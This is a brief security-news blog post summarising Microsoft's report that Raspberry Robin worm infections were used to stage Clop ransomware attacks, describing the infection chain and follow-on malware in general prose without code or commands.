Microsoft links Raspberry Robin worm to Clop ransomware attacks

Home/Compromised, Exploitation, IOC's, Malicious extension, Malware, Microsoft, Ransomware, Security Advisory, Security Update, vulnerability/Microsoft links Raspberry Robin worm to Clop ransomware attacks

Microsoft links Raspberry Robin worm to Clop ransomware attacks

Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks. 

The experts noticed that threat actors tracked as DEV-0950 used Clop ransomware to encrypt the network of organizations previously infected with the worm.

Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

The DEV-0950 attacks led to the deployment of the Cobalt Strike beacon. In some cases, the attackers delivered the Truebot malware between the Raspberry Robin infection and the Cobalt Strike deployment.

DEV-0206 is an access broker tracked by Microsoft, which uses malvertising campaigns to compromise networks worldwide.

Reference :Microsoft

However Microsoft researchers says “DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages,”

The Raspberry Robin malware was first spotted in September 2021, the experts observed Raspberry Robin targeting organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Microsoft Defender have provided few mitigations to reduce the impact of threat.

Indicators of compromise (IOCs)



Follow Us on: Twitter, InstagramFacebook to get the latest security news!

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!